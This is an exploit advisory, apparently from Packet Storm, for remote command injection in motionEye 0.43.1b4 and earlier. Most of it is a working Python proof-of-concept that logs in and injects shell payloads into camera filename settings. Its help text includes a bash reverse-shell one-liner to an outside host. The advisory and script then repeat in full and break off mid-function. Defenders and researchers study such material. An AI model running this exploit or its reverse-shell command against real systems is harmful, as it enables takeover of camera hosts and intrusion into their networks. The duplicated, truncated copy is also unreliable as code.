7.2
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Description
A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters. Under certain conditions,...
Basic Information
ID
PACKETSTORM:215797
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : motionEye ≤ 0.43.1b4 Remote Command Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/motioneye-project/ |
=============================================================================================================================================
[+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4.
The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters.
Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.
Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full
system compromise, data exfiltration, service disruption, or lateral movement within the network.
The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import re
import json
import logging
from typing import Optional, Dict, List, Tuple, Set, Any
from urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import RequestException, Timeout, ConnectionError
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s] %(levelname)s: %(message)s',
datefmt='%H:%M:%S'
)
logger = logging.getLogger(__name__)
try:
from bs4 import BeautifulSoup
BS_AVAILABLE = True
except ImportError:
BS_AVAILABLE = False
logger.warning("BeautifulSoup not installed. HTML parsing will be limited.")
logger.warning("Install with: pip install beautifulsoup4")
class MotionEyeExploitError(Exception):
"""Custom exception for MotionEye exploit errors."""
pass
class MotionEyeExploit:
SESSION_COOKIE_NAMES = {'session', 'motioneye.session', 'meye_session', 'beaker.session.id'}
SUCCESS_INDICATORS = {
'success', 'saved', 'updated', 'applied', 'configuration saved'
}
def __init__(self, target_url: str, username: str = "admin", password: str = "", timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.default_timeout = timeout
self.session = requests.Session()
self.session.verify = False
self.csrf_token: Optional[str] = None
self.cameras: List[Dict] = []
self.authenticated = False
self.session_cookie_name: Optional[str] = None
self.last_command: Optional[str] = None
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
})
def _check_dependencies(self) -> bool:
"""Check if required dependencies are available."""
if not BS_AVAILABLE:
logger.error("BeautifulSoup is required for reliable HTML parsing.")
logger.error("Install it with: pip install beautifulsoup4")
return False
return True
def _extract_csrf_token(self, html_content: str) -> Optional[str]:
"""
Extract CSRF token from HTML content using multiple methods.
"""
patterns = [
r'name=["\']csrf_token["\']\s+value=["\']([^"\']+)["\']',
r'name=["\']csrf_token["\']\s+content=["\']([^"\']+)["\']',
r'csrf_token[=:]\s*["\']([^"\']+)["\']',
r'data-csrf-token=["\']([^"\']+)["\']',
r'var\s+csrf_token\s*=\s*["\']([^"\']+)["\']',
]
for pattern in patterns:
match = re.search(pattern, html_content, re.IGNORECASE)
if match:
token = match.group(1)
logger.debug(f"Found CSRF token via regex: {token[:10]}...")
return token
if BS_AVAILABLE:
try:
soup = BeautifulSoup(html_content, 'html.parser')
csrf_input = soup.find('input', {'name': 'csrf_token'})
if csrf_input and csrf_input.get('value'):
return csrf_input['value']
meta_tag = soup.find('meta', {'name': 'csrf_token'})
if meta_tag and meta_tag.get('content'):
return meta_tag['content']
scripts = soup.find_all('script')
for script in scripts:
if script.string:
var_match = re.search(r'csrf_token\s*=\s*["\']([^"\']+)["\']', script.string)
if var_match:
return var_match.group(1)
except Exception as e:
logger.debug(f"BeautifulSoup parsing error: {e}")
logger.warning("Could not extract CSRF token")
return None
def _has_valid_session(self) -> bool:
"""
Check if the current session has a valid authentication cookie.
"""
if not self.session.cookies:
logger.debug("No cookies found in session")
return False
session_cookies_found = []
for cookie_name in self.session.cookies.keys():
if cookie_name.lower() in self.SESSION_COOKIE_NAMES:
session_cookies_found.append(cookie_name)
self.session_cookie_name = cookie_name
logger.debug(f"Found potential session cookie: {cookie_name}")
if session_cookies_found:
logger.debug(f"Session cookies found: {session_cookies_found}")
return True
logger.debug("No known session cookie names found")
return False
def _verify_dashboard_access(self) -> bool:
"""
Verify we can access the dashboard by checking for specific elements.
"""
try:
response = self._make_request('GET', '/', timeout=10)
if not response or response.status_code != 200:
logger.debug("Dashboard access failed: HTTP error")
return False
if BS_AVAILABLE:
try:
soup = BeautifulSoup(response.text, 'html.parser')
dashboard_indicators = [
soup.find('div', {'id': 'dashboard'}),
soup.find('div', {'class': 'dashboard'}),
soup.find('div', {'data-page': 'dashboard'}),
soup.find('a', href=re.compile(r'/camera-\d+')),
soup.find('button', string=re.compile(r'cameras?', re.I)),
soup.find('span', string=re.compile(r'motioneye', re.I)),
]
if any(dashboard_indicators):
logger.debug("Dashboard access verified via BeautifulSoup")
return True
except Exception as e:
logger.debug(f"BeautifulSoup dashboard verification failed: {e}")
dashboard_patterns = [
r'dashboard',
r'camera-\d+',
r'motioneye',
r'still_images',
r'movies',
]
for pattern in dashboard_patterns:
if re.search(pattern, response.text, re.I):
logger.debug(f"Dashboard access verified via regex pattern: {pattern}")
return True
logger.debug("No dashboard indicators found in response")
return False
except Exception as e:
logger.debug(f"Dashboard verification error: {e}")
return False
def _make_request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]:
"""
Make HTTP request with proper error handling and timeout.
"""
url = f"{self.target_url}{endpoint}"
if 'timeout' not in kwargs:
kwargs['timeout'] = self.default_timeout
max_retries = kwargs.pop('max_retries', 2)
for attempt in range(max_retries):
try:
logger.debug(f"Making {method} request to {endpoint} (attempt {attempt + 1})")
response = self.session.request(method, url, **kwargs)
logger.debug(f"Response status: {response.status_code}")
logger.debug(f"Response headers: {dict(response.headers)}")
return response
except Timeout as e:
logger.warning(f"Request timeout to {endpoint} (attempt {attempt + 1}): {e}")
except ConnectionError as e:
logger.warning(f"Connection error to {endpoint}: {e} (attempt {attempt + 1})")
except RequestException as e:
logger.warning(f"Request failed for {endpoint}: {e} (attempt {attempt + 1})")
if attempt < max_retries - 1:
wait_time = 1 * (attempt + 1)
logger.debug(f"Waiting {wait_time} seconds before retry...")
time.sleep(wait_time)
logger.error(f"All {max_retries} attempts failed for {endpoint}")
return None
def login(self) -> bool:
"""
Authenticate to motionEye and establish session.
"""
logger.info(f"Attempting login to {self.target_url} as {self.username}")
if self._has_valid_session():
logger.debug("Found session cookies, verifying dashboard access...")
if self._verify_dashboard_access():
logger.info("Already have valid session")
self.authenticated = True
return True
else:
logger.debug("Session cookies present but cannot access dashboard")
response = self._make_request('GET', '/')
if not response:
logger.error("Failed to fetch login page")
return False
self.csrf_token = self._extract_csrf_token(response.text)
if not self.csrf_token:
logger.error("Could not extract CSRF token from login page")
return False
logger.debug(f"CSRF token extracted: {self.csrf_token[:10]}...")
login_data = {
'username': self.username,
'password': self.password,
'csrf_token': self.csrf_token
}
response = self._make_request(
'POST', '/login',
data=login_data,
allow_redirects=False,
max_retries=1
)
if not response:
return False
login_success = False
if response.status_code == 302:
location = response.headers.get('Location', '')
if location == '/' or 'dashboard' in location:
login_success = True
logger.debug("Login success via 302 redirect")
elif response.status_code == 200:
if self._has_valid_session():
login_success = True
logger.debug("Login success via session cookie")
elif 'window.location' in response.text and ('/' in response.text or 'dashboard' in response.text):
login_success = True
logger.debug("Login success via JavaScript redirect")
if login_success:
if self._verify_dashboard_access():
logger.info("Login successful - dashboard accessible")
self.authenticated = True
return True
else:
logger.warning("Login seemed successful but dashboard not accessible")
if self._has_valid_session():
self.authenticated = True
return True
else:
logger.error(f"Login failed. Status code: {response.status_code}")
return False
def get_cameras(self, force_refresh: bool = False) -> bool:
"""
Fetch list of available cameras from the dashboard.
Args:
force_refresh: If True, clear existing camera list before fetching
"""
if force_refresh:
self.cameras.clear()
logger.debug("Cleared existing camera list")
elif self.cameras:
logger.debug(f"Using cached camera list ({len(self.cameras)} cameras)")
return True
logger.info("Fetching list of cameras")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
response = self._make_request('GET', '/')
if not response:
return False
cameras_found = set()
if BS_AVAILABLE:
try:
soup = BeautifulSoup(response.text, 'html.parser')
camera_links = soup.find_all('a', href=re.compile(r'^/camera-\d+'))
for link in camera_links:
camera_id = link.get('href').strip('/')
if camera_id and camera_id not in cameras_found:
camera_name = link.get_text().strip()
self.cameras.append({
'id': camera_id,
'name': camera_name or camera_id
})
cameras_found.add(camera_id)
camera_divs = soup.find_all('div', {'data-camera-id': True})
for div in camera_divs:
camera_id = div.get('data-camera-id')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': div.get('data-camera-name', camera_id)
})
cameras_found.add(camera_id)
camera_options = soup.find_all('option', value=re.compile(r'^camera-\d+'))
for option in camera_options:
camera_id = option.get('value')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': option.get_text().strip() or camera_id
})
cameras_found.add(camera_id)
except Exception as e:
logger.error(f"Error parsing cameras with BeautifulSoup: {e}")
if not self.cameras:
logger.debug("Using regex fallback for camera detection")
camera_matches = re.findall(r'/camera-(\d+)', response.text)
for camera_num in set(camera_matches):
camera_id = f"camera-{camera_num}"
self.cameras.append({
'id': camera_id,
'name': f"Camera {camera_num}"
})
if not self.cameras:
logger.warning("No cameras found, using default 'camera-1'")
self.cameras.append({'id': 'camera-1', 'name': 'Default Camera'})
logger.info(f"Found {len(self.cameras)} unique camera(s): {[c['id'] for c in self.cameras]}")
return True
def _escape_for_transport(self, command: str) -> str:
"""
Escape a command for safe transport in HTTP POST data.
This ensures the command is properly transmitted, not escaped for shell.
"""
escaped = command.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
dangerous_chars = ['`', '$', '(', ')', '|', '&', ';', '<', '>', '*', '?', '[', ']', '{', '}']
found_chars = [c for c in dangerous_chars if c in command]
if found_chars:
logger.info(f"Command contains shell metacharacters: {found_chars}")
logger.debug("These are INTENTIONAL for command injection")
return escaped
def _check_response_success(self, response: requests.Response) -> Tuple[bool, str]:
"""
Check if a response indicates successful configuration update.
Returns (success, message)
"""
if response.status_code not in [200, 201, 202, 204, 302]:
return False, f"HTTP {response.status_code}"
try:
json_data = response.json()
if isinstance(json_data, dict):
if json_data.get('status') == 'ok':
return True, "JSON status: ok"
if json_data.get('success') is True:
return True, "JSON success: true"
if json_data.get('error'):
return False, f"JSON error: {json_data['error']}"
except (json.JSONDecodeError, ValueError):
pass
response_text = response.text.lower()
error_patterns = ['error', 'fail', 'invalid', 'denied', 'forbidden']
has_error = any(pattern in response_text for pattern in error_patterns)
if has_error:
success_found = any(indicator.lower() in response_text for indicator in self.SUCCESS_INDICATORS)
if success_found:
logger.warning("Response contains both success and error indicators")
return False, "Ambiguous response (both success and error)"
else:
return False, "Error indicators found"
for indicator in self.SUCCESS_INDICATORS:
if indicator.lower() in response_text:
return True, f"Found indicator: {indicator}"
if response.status_code == 302:
location = response.headers.get('Location', '')
if 'success' in location.lower() or 'saved' in location.lower():
return True, f"Redirect to: {location}"
return False, "No success indicators found"
def inject_payload(self, camera_id: str, command: str) -> bool:
"""
Inject malicious payload into camera configuration.
safe_command = self._escape_for_transport(command)
payload_variants = [
f"$({safe_command}).%Y-%m-%d-%H-%M-%S",
f"`{safe_command}`.%Y-%m-%d-%H-%M-%S",
f";{safe_command};.%Y-%m-%d-%H-%M-%S",
f"|{safe_command}|.%Y-%m-%d-%H-%M-%S",
]
logger.info(f"Injecting payload into camera: {camera_id}")
response = self._make_request('GET', '/', timeout=10)
if response:
token = self._extract_csrf_token(response.text)
if token:
self.csrf_token = token
logger.debug("Refreshed CSRF token")
endpoints = [
f"/{camera_id}/config/set",
"/config/set",
f"/{camera_id}/edit",
"/config/update",
"/settings/camera",
]
for endpoint in endpoints:
for idx, payload in enumerate(payload_variants):
logger.debug(f"Trying endpoint: {endpoint} with payload variant {idx + 1}")
data = {
'still_images_image_file_name': payload,
'movie_file_name': payload,
'timelapse_file_name': payload,
}
if self.csrf_token:
data['csrf_token'] = self.csrf_token
headers = {}
if self.csrf_token:
headers['X-CSRFToken'] = self.csrf_token
response = self._make_request('POST', endpoint, data=data, headers=headers)
if not response:
continue
success, message = self._check_response_success(response)
if success:
logger.info(f"Payload injected successfully via {endpoint}")
logger.debug(f"Success message: {message}")
return True
logger.debug(f"Endpoint {endpoint} returned: {message}")
logger.error(f"Failed to inject payload through any endpoint for camera {camera_id}")
return False
def restart_motion(self) -> bool:
"""
Attempt to restart motion service through various endpoints.
"""
logger.info("Attempting to restart motion service")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
restart_endpoints = [
('/action/restart', 'POST', {}),
('/action/restart_motion', 'POST', {}),
('/action/restart_all', 'POST', {}),
('/config/restart', 'POST', {}),
('/restart', 'GET', {}),
('/api/restart', 'POST', {'Content-Type': 'application/json'}),
]
for endpoint, method, headers in restart_endpoints:
logger.debug(f"Trying {method} {endpoint}")
data = {}
if self.csrf_token and method == 'POST':
data['csrf_token'] = self.csrf_token
try:
if method == 'POST':
response = self._make_request('POST', endpoint, data=data, headers=headers)
else:
response = self._make_request('GET', endpoint, headers=headers)
if response:
if response.status_code in [200, 202, 204, 302]:
logger.info(f"Restart triggered via {endpoint}")
return True
else:
logger.debug(f"Endpoint {endpoint} returned {response.status_code}")
except Exception as e:
logger.debug(f"Error with {endpoint}: {e}")
continue
logger.warning("Could not trigger restart automatically")
return False
def verify_exploit(self, expected_file: str = "/tmp/pwned_verified") -> bool:
"""
Verify if the exploit was successful by checking for expected evidence.
Returns True if verification succeeded, False if failed or inconclusive.
"""
logger.info("Verifying exploit success...")
if self.last_command and 'touch' in self.last_command:
touch_match = re.search(r'touch\s+([^\s;|&]+)', self.last_command)
if touch_match:
expected_file = touch_match.group(1)
logger.info(f"Looking for created file: {expected_file}")
filename = expected_file.split('/')[-1] if '/' in expected_file else expected_file
web_paths = [
f"/motion/{filename}",
f"/static/{filename}",
f"/media/{filename}",
f"/{filename}",
]
for web_path in web_paths:
response = self._make_request('GET', web_path, timeout=10)
if response and response.status_code == 200:
logger.info(f"Found expected file at {web_path}")
return True
logger.info("=" * 60)
logger.info("MANUAL VERIFICATION REQUIRED:")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command executed: {self.last_command or 'unknown'}")
logger.info(f"Expected evidence: {expected_file}")
logger.info("\nTo verify on Docker:")
logger.info(f" docker exec motioneye ls -la {expected_file}")
logger.info("\nTo verify on system:")
logger.info(f" ls -la {expected_file}")
logger.info("\nTo verify via web (if accessible):")
logger.info(f" curl -k {self.target_url}/motion/")
logger.info("=" * 60)
return False
def run(self, command: str) -> Dict[str, bool]:
"""
Execute the full exploit chain.
Returns dictionary with status of each step.
"""
results = {
'login': False,
'cameras': False,
'injection': False,
'restart': False,
'verification': False,
'overall': False
}
self.last_command = command
logger.info("=" * 60)
logger.info("Starting motionEye RCE exploit")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command: {command}")
logger.info("=" * 60)
if not self._check_dependencies():
logger.error("Dependencies check failed")
return results
if not self.login():
logger.error("Login failed. Exiting.")
return results
results['login'] = True
if not self.get_cameras():
logger.error("Failed to get camera list")
return results
results['cameras'] = True
injection_success = False
for camera in self.cameras:
if self.inject_payload(camera['id'], command):
injection_success = True
break
if not injection_success:
logger.error("Failed to inject payload into any camera")
results['injection'] = False
return results
results['injection'] = True
if self.restart_motion():
results['restart'] = True
wait_time = 10
logger.info(f"Waiting {wait_time} seconds for command execution...")
time.sleep(wait_time)
results['verification'] = self.verify_exploit()
results['overall'] = injection_success
logger.info("=" * 60)
logger.info("Exploit execution completed")
logger.info(f"Results: {results}")
logger.info("=" * 60)
return results
def main():
"""
Main function with argument parsing.
"""
import argparse
parser = argparse.ArgumentParser(
description="MotionEye <= 0.43.1b4 RCE Exploit (CVE-2025-60787)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://192.168.1.100:8765 -c "touch /tmp/pwned"
%(prog)s -t https://motioneye.local -c "id > /tmp/output" -v
%(prog)s -t http://localhost:9999 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --dangerous
"""
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., http://127.0.0.1:8765)')
parser.add_argument('-u', '--username', default='admin',
help='Username (default: admin)')
parser.add_argument('-p', '--password', default='',
help='Password (default: empty)')
parser.add_argument('-c', '--command',
default='touch /tmp/pwned_by_exploit',
help='Command to execute (default: touch /tmp/pwned_by_exploit)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
parser.add_argument('--dangerous', action='store_true',
help='Acknowledge that the command may be dangerous')
parser.add_argument('--camera', help='Specific camera ID to target (default: auto-detect)')
parser.add_argument('--timeout', type=int, default=30,
help='Request timeout in seconds (default: 30)')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
dangerous_patterns = ['bash -i', 'nc ', 'reverse', 'shell', 'exec', '/dev/tcp/']
if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous:
logger.warning(" Command appears to be potentially dangerous!")
logger.warning("Use --dangerous flag to proceed with this command")
sys.exit(1)
exploit = MotionEyeExploit(
target_url=args.target,
username=args.username,
password=args.password,
timeout=args.timeout
)
try:
results = exploit.run(args.command)
if results['overall']:
if results['verification']:
logger.info(" Exploit fully successful - command execution verified")
sys.exit(0)
else:
logger.info(" Exploit likely successful - manual verification required")
sys.exit(2)
else:
logger.error(" Exploit failed")
sys.exit(1)
except KeyboardInterrupt:
logger.info("\nExploit interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : motionEye ≤ 0.43.1b4 Remote Command Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/motioneye-project/ |
=============================================================================================================================================
[+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4.
The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters.
Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.
Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full
system compromise, data exfiltration, service disruption, or lateral movement within the network.
The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import re
import json
import logging
from typing import Optional, Dict, List, Tuple, Set, Any
from urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import RequestException, Timeout, ConnectionError
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s] %(levelname)s: %(message)s',
datefmt='%H:%M:%S'
)
logger = logging.getLogger(__name__)
try:
from bs4 import BeautifulSoup
BS_AVAILABLE = True
except ImportError:
BS_AVAILABLE = False
logger.warning("BeautifulSoup not installed. HTML parsing will be limited.")
logger.warning("Install with: pip install beautifulsoup4")
class MotionEyeExploitError(Exception):
"""Custom exception for MotionEye exploit errors."""
pass
class MotionEyeExploit:
SESSION_COOKIE_NAMES = {'session', 'motioneye.session', 'meye_session', 'beaker.session.id'}
SUCCESS_INDICATORS = {
'success', 'saved', 'updated', 'applied', 'configuration saved'
}
def __init__(self, target_url: str, username: str = "admin", password: str = "", timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.default_timeout = timeout
self.session = requests.Session()
self.session.verify = False
self.csrf_token: Optional[str] = None
self.cameras: List[Dict] = []
self.authenticated = False
self.session_cookie_name: Optional[str] = None
self.last_command: Optional[str] = None
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
})
def _check_dependencies(self) -> bool:
"""Check if required dependencies are available."""
if not BS_AVAILABLE:
logger.error("BeautifulSoup is required for reliable HTML parsing.")
logger.error("Install it with: pip install beautifulsoup4")
return False
return True
def _extract_csrf_token(self, html_content: str) -> Optional[str]:
"""
Extract CSRF token from HTML content using multiple methods.
"""
patterns = [
r'name=["\']csrf_token["\']\s+value=["\']([^"\']+)["\']',
r'name=["\']csrf_token["\']\s+content=["\']([^"\']+)["\']',
r'csrf_token[=:]\s*["\']([^"\']+)["\']',
r'data-csrf-token=["\']([^"\']+)["\']',
r'var\s+csrf_token\s*=\s*["\']([^"\']+)["\']',
]
for pattern in patterns:
match = re.search(pattern, html_content, re.IGNORECASE)
if match:
token = match.group(1)
logger.debug(f"Found CSRF token via regex: {token[:10]}...")
return token
if BS_AVAILABLE:
try:
soup = BeautifulSoup(html_content, 'html.parser')
csrf_input = soup.find('input', {'name': 'csrf_token'})
if csrf_input and csrf_input.get('value'):
return csrf_input['value']
meta_tag = soup.find('meta', {'name': 'csrf_token'})
if meta_tag and meta_tag.get('content'):
return meta_tag['content']
scripts = soup.find_all('script')
for script in scripts:
if script.string:
var_match = re.search(r'csrf_token\s*=\s*["\']([^"\']+)["\']', script.string)
if var_match:
return var_match.group(1)
except Exception as e:
logger.debug(f"BeautifulSoup parsing error: {e}")
logger.warning("Could not extract CSRF token")
return None
def _has_valid_session(self) -> bool:
"""
Check if the current session has a valid authentication cookie.
"""
if not self.session.cookies:
logger.debug("No cookies found in session")
return False
session_cookies_found = []
for cookie_name in self.session.cookies.keys():
if cookie_name.lower() in self.SESSION_COOKIE_NAMES:
session_cookies_found.append(cookie_name)
self.session_cookie_name = cookie_name
logger.debug(f"Found potential session cookie: {cookie_name}")
if session_cookies_found:
logger.debug(f"Session cookies found: {session_cookies_found}")
return True
logger.debug("No known session cookie names found")
return False
def _verify_dashboard_access(self) -> bool:
"""
Verify we can access the dashboard by checking for specific elements.
"""
try:
response = self._make_request('GET', '/', timeout=10)
if not response or response.status_code != 200:
logger.debug("Dashboard access failed: HTTP error")
return False
if BS_AVAILABLE:
try:
soup = BeautifulSoup(response.text, 'html.parser')
dashboard_indicators = [
soup.find('div', {'id': 'dashboard'}),
soup.find('div', {'class': 'dashboard'}),
soup.find('div', {'data-page': 'dashboard'}),
soup.find('a', href=re.compile(r'/camera-\d+')),
soup.find('button', string=re.compile(r'cameras?', re.I)),
soup.find('span', string=re.compile(r'motioneye', re.I)),
]
if any(dashboard_indicators):
logger.debug("Dashboard access verified via BeautifulSoup")
return True
except Exception as e:
logger.debug(f"BeautifulSoup dashboard verification failed: {e}")
dashboard_patterns = [
r'dashboard',
r'camera-\d+',
r'motioneye',
r'still_images',
r'movies',
]
for pattern in dashboard_patterns:
if re.search(pattern, response.text, re.I):
logger.debug(f"Dashboard access verified via regex pattern: {pattern}")
return True
logger.debug("No dashboard indicators found in response")
return False
except Exception as e:
logger.debug(f"Dashboard verification error: {e}")
return False
def _make_request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]:
"""
Make HTTP request with proper error handling and timeout.
"""
url = f"{self.target_url}{endpoint}"
if 'timeout' not in kwargs:
kwargs['timeout'] = self.default_timeout
max_retries = kwargs.pop('max_retries', 2)
for attempt in range(max_retries):
try:
logger.debug(f"Making {method} request to {endpoint} (attempt {attempt + 1})")
response = self.session.request(method, url, **kwargs)
logger.debug(f"Response status: {response.status_code}")
logger.debug(f"Response headers: {dict(response.headers)}")
return response
except Timeout as e:
logger.warning(f"Request timeout to {endpoint} (attempt {attempt + 1}): {e}")
except ConnectionError as e:
logger.warning(f"Connection error to {endpoint}: {e} (attempt {attempt + 1})")
except RequestException as e:
logger.warning(f"Request failed for {endpoint}: {e} (attempt {attempt + 1})")
if attempt < max_retries - 1:
wait_time = 1 * (attempt + 1)
logger.debug(f"Waiting {wait_time} seconds before retry...")
time.sleep(wait_time)
logger.error(f"All {max_retries} attempts failed for {endpoint}")
return None
def login(self) -> bool:
"""
Authenticate to motionEye and establish session.
"""
logger.info(f"Attempting login to {self.target_url} as {self.username}")
if self._has_valid_session():
logger.debug("Found session cookies, verifying dashboard access...")
if self._verify_dashboard_access():
logger.info("Already have valid session")
self.authenticated = True
return True
else:
logger.debug("Session cookies present but cannot access dashboard")
response = self._make_request('GET', '/')
if not response:
logger.error("Failed to fetch login page")
return False
self.csrf_token = self._extract_csrf_token(response.text)
if not self.csrf_token:
logger.error("Could not extract CSRF token from login page")
return False
logger.debug(f"CSRF token extracted: {self.csrf_token[:10]}...")
login_data = {
'username': self.username,
'password': self.password,
'csrf_token': self.csrf_token
}
response = self._make_request(
'POST', '/login',
data=login_data,
allow_redirects=False,
max_retries=1
)
if not response:
return False
login_success = False
if response.status_code == 302:
location = response.headers.get('Location', '')
if location == '/' or 'dashboard' in location:
login_success = True
logger.debug("Login success via 302 redirect")
elif response.status_code == 200:
if self._has_valid_session():
login_success = True
logger.debug("Login success via session cookie")
elif 'window.location' in response.text and ('/' in response.text or 'dashboard' in response.text):
login_success = True
logger.debug("Login success via JavaScript redirect")
if login_success:
if self._verify_dashboard_access():
logger.info("Login successful - dashboard accessible")
self.authenticated = True
return True
else:
logger.warning("Login seemed successful but dashboard not accessible")
if self._has_valid_session():
self.authenticated = True
return True
else:
logger.error(f"Login failed. Status code: {response.status_code}")
return False
def get_cameras(self, force_refresh: bool = False) -> bool:
"""
Fetch list of available cameras from the dashboard.
Args:
force_refresh: If True, clear existing camera list before fetching
"""
if force_refresh:
self.cameras.clear()
logger.debug("Cleared existing camera list")
elif self.cameras:
logger.debug(f"Using cached camera list ({len(self.cameras)} cameras)")
return True
logger.info("Fetching list of cameras")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
response = self._make_request('GET', '/')
if not response:
return False
cameras_found = set()
if BS_AVAILABLE:
try:
soup = BeautifulSoup(response.text, 'html.parser')
camera_links = soup.find_all('a', href=re.compile(r'^/camera-\d+'))
for link in camera_links:
camera_id = link.get('href').strip('/')
if camera_id and camera_id not in cameras_found:
camera_name = link.get_text().strip()
self.cameras.append({
'id': camera_id,
'name': camera_name or camera_id
})
cameras_found.add(camera_id)
camera_divs = soup.find_all('div', {'data-camera-id': True})
for div in camera_divs:
camera_id = div.get('data-camera-id')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': div.get('data-camera-name', camera_id)
})
cameras_found.add(camera_id)
camera_options = soup.find_all('option', value=re.compile(r'^camera-\d+'))
for option in camera_options:
camera_id = option.get('value')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': option.get_text().strip() or camera_id
})
cameras_found.add(camera_id)
except Exception as e:
logger.error(f"Error parsing cameras with BeautifulSoup: {e}")
if not self.cameras:
logger.debug("Using regex fallback for camera detection")
camera_matches = re.findall(r'/camera-(\d+)', response.text)
for camera_num in set(camera_matches):
camera_id = f"camera-{camera_num}"
self.cameras.append({
'id': camera_id,
'name': f"Camera {camera_num}"
})
if not self.cameras:
logger.warning("No cameras found, using default 'camera-1'")
self.cameras.append({'id': 'camera-1', 'name': 'Default Camera'})
logger.info(f"Found {len(self.cameras)} unique camera(s): {[c['id'] for c in self.cameras]}")
return True
def _escape_for_transport(self, command: str) -> str:
"""
Escape a command for safe transport in HTTP POST data.
This ensures the command is properly transmitted, not escaped for shell.
"""
escaped = command.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
dangerous_chars = ['`', '$', '(', ')', '|', '&', ';', '<', '>', '*', '?', '[', ']', '{', '}']
found_chars = [c for c in dangerous_chars if c in command]
if found_chars:
logger.info(f"Command contains shell metacharacters: {found_chars}")
logger.debug("These are INTENTIONAL for command injection")
return escaped
def _check_response_success(self, response: requests.Response) -> Tuple[bool, str]:
"""
Check if a response indicates successful configuration update.
Returns (success, message)
"""
if response.status_code not in [200, 201, 202, 204, 302]:
return False, f"HTTP {response.status_code}"
try:
json_data = response.json()
if isinstance(json_data, dict):
if json_data.get('status') == 'ok':
return True, "JSON status: ok"
if json_data.get('success') is True:
return True, "JSON success: true"
if json_data.get('error'):
return False, f"JSON error: {json_data['error']}"
except (json.JSONDecodeError, ValueError):
pass
response_text = response.text.lower()
error_patterns = ['error', 'fail', 'invalid', 'denied', 'forbidden']
has_error = any(pattern in response_text for pattern in error_patterns)
if has_error:
success_found = any(indicator.lower() in response_text for indicator in self.SUCCESS_INDICATORS)
if success_found:
logger.warning("Response contains both success and error indicators")
return False, "Ambiguous response (both success and error)"
else:
return False, "Error indicators found"
for indicator in self.SUCCESS_INDICATORS:
if indicator.lower() in response_text:
return True, f"Found indicator: {indicator}"
if response.status_code == 302:
location = response.headers.get('Location', '')
if 'success' in location.lower() or 'saved' in location.lower():
return True, f"Redirect to: {location}"
return False, "No success indicators found"
def inject_payload(self, camera_id: str, command: str) -> bool:
"""
Inject malicious payload into camera configuration.
safe_command = self._escape_for_transport(command)
payload_variants = [
f"$({safe_command}).%Y-%m-%d-%H-%M-%S",
